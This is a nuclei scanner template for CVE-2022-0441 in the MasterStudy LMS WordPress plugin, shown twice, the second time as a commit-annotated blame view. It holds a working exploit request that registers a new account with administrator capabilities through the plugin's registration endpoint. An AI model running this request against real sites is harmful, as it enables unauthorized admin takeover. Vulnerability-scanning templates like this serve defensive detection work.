nuclei-templates/cves/2022/CVE-2022-0441.yaml

id: CVE-2022-0441

info:
  name: WordPress MasterStudy LMS Plugin Privilege Escalation
  author: dwisiswant0
  severity: critical
  description: |
    The MasterStudy LMS WordPress plugin before 2.7.6 does to
    validate some parameters given when registering a new account,
    allowing unauthenticated users to register as an admin.
  reference:
    - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
  remediation: Upgrade to version >= 2.7.6.
  tags: cve,cve2022,wordpress,privx,headless

variables:
  username: "{{to_lower(rand_text_alphanumeric(6))}}"
  password: "{{rand_text_alphanumeric(8)}}"

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/"

      - action: waitload

      - action: script
        name: nonce
        code: "stm_lms_nonces.stm_lms_register"

      - action: script
        name: endpoint
        code: "stm_lms_ajaxurl"

      - action: setmethod
        args:
          part: request
          method: POST

      - action: setheader
        args:
          part: request
          key: X-Requested-With

      - action: setheader
        args:
          part: request
          key: application/json

      - action: setbody
        args:
          part: request
          body: |
            {
              "user_login": "{{username}}",
              "user_email": "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com",
              "user_password": "{{password}}",
              "user_password_re": "{{password}}",
              "become_instructor": "",
              "privacy_policy": true,
              "degree": "",
              "expertize": "",
              "auditory": "",
              "additional": [],
              "additional_instructors": [],
              "profile_default_fields_for_register": {
                "wp_capabilities": {
                  "value": {
                    "administrator": 1
                  }
                }
              }
            }

      - action: navigate
        name: register
        args:
          url: "{{endpoint}}?action=stm_lms_register&nonce={{nonce}}"

      - action: waitload

      - action: script
        name: status
        code: "status" # extract JSON object response

    matchers-condition: and
    matchers:
      - type: regex
        part: nonce
        regex:
          - "^[a-f0-9]+"

      - type: word
        part: endpoint
        words:
          - "admin-ajax.php"

      - type: word
        part: status
        words:
          - "success"
Add CVE-2022-0441 2022-06-30 07:40:45 +00:00			`id: CVE-2022-0441`

			`info:`
			`name: WordPress MasterStudy LMS Plugin Privilege Escalation`
			`author: dwisiswant0`
			`severity: critical`
			`description: \|`
			`The MasterStudy LMS WordPress plugin before 2.7.6 does to`
			`validate some parameters given when registering a new account,`
			`allowing unauthenticated users to register as an admin.`
			`reference:`
			`- https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed`
			`remediation: Upgrade to version >= 2.7.6.`
			`tags: cve,cve2022,wordpress,privx,headless`

			`variables:`
			`username: "{{to_lower(rand_text_alphanumeric(6))}}"`
			`password: "{{rand_text_alphanumeric(8)}}"`

			`headless:`
			`- steps:`
			`- action: navigate`
			`args:`
			`url: "{{BaseURL}}/"`

			`- action: waitload`

			`- action: script`
			`name: nonce`
			`code: "stm_lms_nonces.stm_lms_register"`

			`- action: script`
			`name: endpoint`
			`code: "stm_lms_ajaxurl"`

			`- action: setmethod`
			`args:`
			`part: request`
			`method: POST`

			`- action: setheader`
			`args:`
			`part: request`
			`key: X-Requested-With`

			`- action: setheader`
			`args:`
			`part: request`
			`key: application/json`

			`- action: setbody`
			`args:`
			`part: request`
			`body: \|`
			`{`
			`"user_login": "{{username}}",`
			`"user_email": "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com",`
			`"user_password": "{{password}}",`
			`"user_password_re": "{{password}}",`
			`"become_instructor": "",`
			`"privacy_policy": true,`
			`"degree": "",`
			`"expertize": "",`
			`"auditory": "",`
			`"additional": [],`
			`"additional_instructors": [],`
			`"profile_default_fields_for_register": {`
			`"wp_capabilities": {`
			`"value": {`
			`"administrator": 1`
			`}`
			`}`
			`}`
			`}`

			`- action: navigate`
			`name: register`
			`args:`
			`url: "{{endpoint}}?action=stm_lms_register&nonce={{nonce}}"`

			`- action: waitload`

			`- action: script`
			`name: status`
			`code: "status" # extract JSON object response`

			`matchers-condition: and`
			`matchers:`
CVE-2022-0441: update matchers 2022-06-30 07:47:14 +00:00			`- type: regex`
Add CVE-2022-0441 2022-06-30 07:40:45 +00:00			`part: nonce`
CVE-2022-0441: update matchers 2022-06-30 07:47:14 +00:00			`regex:`
			`- "^[a-f0-9]+"`
Add CVE-2022-0441 2022-06-30 07:40:45 +00:00
CVE-2022-0441: update matchers 2022-06-30 07:47:14 +00:00			`- type: word`
Add CVE-2022-0441 2022-06-30 07:40:45 +00:00			`part: endpoint`
CVE-2022-0441: update matchers 2022-06-30 07:47:14 +00:00			`words:`
			`- "admin-ajax.php"`
Add CVE-2022-0441 2022-06-30 07:40:45 +00:00
CVE-2022-0441: update matchers 2022-06-30 07:47:14 +00:00			`- type: word`
Add CVE-2022-0441 2022-06-30 07:40:45 +00:00			`part: status`
CVE-2022-0441: update matchers 2022-06-30 07:47:14 +00:00			`words:`
			`- "success"`